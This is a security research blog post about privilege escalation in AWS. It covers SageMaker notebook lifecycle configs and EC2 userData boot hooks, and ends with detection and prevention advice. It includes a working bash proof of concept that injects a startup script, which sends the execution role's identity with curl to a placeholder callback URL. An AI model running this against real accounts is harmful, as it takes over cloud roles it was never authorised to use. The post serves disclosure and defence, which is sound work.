Privilege escalation with SageMaker and there's more hiding in execution roles

How we vibin’ young people? I am not a young person, but I know that’s how you speak, no cap.

In 2016, pre-back injuries and naps, I found a fun little privilege escalation path in EC2. It’s pretty simple: if an attacker can call ec2:StartInstances and ec2:StopInstances and also ec2:ModifyInstanceAttribute on an existing EC2 instance, they can get the privileges of its instance profile (AKA execution role).

It’s pretty simple. There’s an out-of-band way to modify the code on the instance using the management API. One of the attributes you can set on an instance using ec2:ModifyInstanceAttribute is userData. This attribute is special because it holds code that is executed on first boot. However, if you put a #cloud-boothook directive in it, it will execute every boot. So a clever attacker can stop an instance, pop the boot hook in there, drop some credential-stealing code, and start the instance again. Voilà, their code runs in the context of the instance, and they get the creds for that context.

This felt like a special case back then, and I can’t recall seeing anything similar since. However, I’ve been fighting service-linked roles, execution roles, and SageMaker for the last couple of weeks and ran into another example or two.

SageMaker privilege escalation

First of all, what on earth is this SageMaker thing?! I mean really. I still can’t figure it out.

The artist formerly known as Amazon SageMaker, now the much clearer and more obvious Amazon SageMaker AI, is “the next generation of Amazon SageMaker is the center for all your data, analytics, and AI”.

It’s 5 services according to the AWS service reference, (sagemaker, sagemaker-data-science-assistant, sagemaker-geospatial, sagemaker-mlflow, sagemaker-unified-studio-mcp) and a different 6 according to its API models, (sagemaker, sagemaker-a2i-runtime, sagemaker-edge, sagemaker-geospatial, sagemaker-metrics).

In the web console it’s much more obvious what it is and the difference between the options:

Then once you actually try to set it up, there are Instances, Studios, RStudios, Domains, Canvases, Partner Apps, Clusters, Jobs, Models, and on and on. This is the most complex, im-gonna-put-all-my-lego-in-a-pile service I have ever seen.

And what’s the point of supporting identity propagation if it doesn’t work on 12 of your lego sets?

But I digress. Back to the privilege escalation.

One of the cool things SageMaker allows you to do is run a managed Jupyter Notebook instance. The marketing team explains that a Notebook instance is a web application for “creating and sharing computational documents”. I think of it as a way of quickly writing dirty, untrusted experimental code and pressing the go button to see what happens when I do.

Under the hood, SageMaker instances are almost certainly just EC2 instances, and EC2 instances and the people that use them need permissions to do stuff. Notebook instances are cooler because of data science, and therefore need even cooler permissions.

If only there was a way to run code on these instances from the management API like we can on EC2? SageMaker has an sagemaker:StopNotebookInstance and sagemaker:StartNotebookInstance actions. There’s no sagemaker:ModifyInstanceAttribute, but there is a sagemaker:UpdateNotebookInstance. That’s similar, but it doesn’t take a userData parameter. Hmmm.

For giggles, what do you think this lifecycle-config-name parameter thing is or does? Isn’t it obvious already?

"A lifecycle configuration is a collection of shell scripts that run when you create or start a notebook instance."

I think we can all agree that calling a shell script ‘config’ is the right way to get the compliance team to go away. These pro tips aren’t free, so make sure you sign up for a demo of the Plerion cloud security platform.

Putting it all together, since all the ingredients are there, just with different names, the privilege escalation is the same:

1. Stop an existing notebook instance.

2. Create a lifecycle config with the AWS credential exfiltration code, or whatever else.

3. Update the notebook instance with the new lifecycle config.

4. Start the notebook instance.

5. Wait for credentials to be delivered or privileged actions executed.

That’s it. API actions have been executed with the context of a different IAM principal. This lets someone run API actions using a role they did not legitimately obtain.

Here’s some proof of concept code I wrote in a SageMaker notebook:

#!/usr/bin/env bash
set -euo pipefail

REGION="[your-aws-region]"
NOTEBOOK_NAME="[your-notebook-name]"
LC_NAME="[your-lifecycle-config-name]"
CALLBACK_URL="[https://example.com/your-endpoint]"

echo "Checking if lifecycle config '$LC_NAME' exists..."

set +e
aws sagemaker describe-notebook-instance-lifecycle-config \
  --region "$REGION" \
  --notebook-instance-lifecycle-config-name "$LC_NAME" >/dev/null 2>&1
EXISTS=$?
set -e

if [ "$EXISTS" -eq 0 ]; then
  echo "Lifecycle config '$LC_NAME' already exists. Skipping creation."
else
  echo "Lifecycle config '$LC_NAME' does not exist. Creating now..."

  # Build lifecycle script
  LIFECYCLE_SCRIPT=$(cat <<EOF
#!/bin/bash
set -e

IDENTITY_JSON=\$(aws sts get-caller-identity --output json 2>/tmp/sts_err || true)

if [ -n "\$IDENTITY_JSON" ]; then
  curl -sS -X POST \
    -H "Content-Type: application/json" \
    -d "\$IDENTITY_JSON" \
    "$CALLBACK_URL" \
    >/tmp/postbin_out 2>&1 || true
fi
EOF
)

  # macOS base64
  ENCODED_SCRIPT=$(printf '%s' "$LIFECYCLE_SCRIPT" | base64 | tr -d '\n')

  aws sagemaker create-notebook-instance-lifecycle-config \
    --region "$REGION" \
    --notebook-instance-lifecycle-config-name "$LC_NAME" \
    --on-start "[{\"Content\":\"$ENCODED_SCRIPT\"}]"

  echo "Lifecycle config created."
fi

echo "Getting notebook status..."
STATUS=$(aws sagemaker describe-notebook-instance \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME" \
  --query 'NotebookInstanceStatus' \
  --output text)

echo "Current notebook status: $STATUS"

if [ "$STATUS" = "InService" ]; then
  echo "Stopping notebook..."
  aws sagemaker stop-notebook-instance \
    --region "$REGION" \
    --notebook-instance-name "$NOTEBOOK_NAME"

  aws sagemaker wait notebook-instance-stopped \
    --region "$REGION" \
    --notebook-instance-name "$NOTEBOOK_NAME"
else
  echo "Notebook not running, skipping stop."
fi

echo "Attaching lifecycle config..."
aws sagemaker update-notebook-instance \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME" \
  --lifecycle-config-name "$LC_NAME"

echo "Waiting for notebook to become Stopped after update..."
aws sagemaker wait notebook-instance-stopped \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME"

echo "Starting notebook..."
aws sagemaker start-notebook-instance \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME"

echo "Done. Lifecycle config attached and notebook restarting."

‍

Generalized privilege escalation pattern with execution roles

Can we generalize further and elsewhere? Probably. (I think it works for SageMaker Studios too, hehe).

Typically, you can’t pass around different privileges like this in AWS unless you have been authorized to do so. That is what the PassRole permission was designed to control. This type of privilege escalation works for two reasons:

The PassRole check happens at configuration time. That is, when you call an API that sets the execution role for a particular resource, that’s the moment the check is performed. Then and only then.
There are sometimes paths to modify what actions will be taken, most notably in the form of custom code, after execution role configuration time. This disentangles the two permission checks from the privileged actions.

If you want to be a clever little hacker, you can probably scour all the API models in AWS, look for where execution roles are used, and then methodically review them for the second reason above. You’d quickly come across lambda:UpdateFunctionCode to change function code after initial setup and lambda:UpdateFunctionConfiguration to add layers that will auto execute when the function runs. Lucian Patian recently (re)discovered (and Erik Steringer and Marco Slaviero before) this pattern applies to cloudformation:CreateChangeSet plus cloudformation:ExecuteChangeSet combination.

Enjoy the hunt!

Prevention and detection

If you’re wondering how to spot this happening in the wild, the indicators are fairly straightforward. In both EC2 and SageMaker versions, the attacker isn’t stealing credentials out of thin air, they’re modifying something that shouldn’t normally change: userData on EC2 or the lifecycle config on a Notebook. In CloudTrail, look for unusual patterns of StopInstances → ModifyInstanceAttribute → StartInstances on EC2, or StopNotebookInstance → UpdateNotebookInstance → StartNotebookInstance on SageMaker, especially when done by identities that don’t normally manage that specific compute.

From a prevention perspective, the fix is equally boring: reduce who can modify the boot-time configuration and enforce a tight boundary around ec2:ModifyInstanceAttribute, sagemaker:UpdateNotebookInstance, and lifecycle config management. And if you really want to be fancy, require approvals or out-of-band review on any config-change-then-start pattern. The TL;DR: treat any ability to change startup code as equivalent to “run arbitrary code as the execution role,” because that’s exactly what it is.

Isn’t it beautiful outside today?

30°C (86°F) in Sydney today. A perfect day. So I used this opportunity to email the AWS Vulnerability Disclosure Program (VDP) to let them know of the great tragedy of this privilege escalation. Here’s what they had to say:

[Edit coming soon, I can feel it]

I don’t know if I would classify this as a vulnerability. Would you? This feels more like an unfortunate side effect of the design choices of the platform. Some slightly older friends might call it an architecture flaw. Regardless, there’s no panic required. Just look out for these privilege combinations when you are building your castle in the clouds.

By the way, there’s been an immense amount of work over the years on AWS privesc. Much, not all, has been collated or linked on HackingTheCloud, so go check that out if you are interested in the topic.

‍

Privilege escalation with SageMaker and there's more hiding in execution roles

Daniel Grzelak

SageMaker privilege escalation

Generalized privilege escalation pattern with execution roles

Prevention and detection

Isn’t it beautiful outside today?

Learn cloud security with our research blog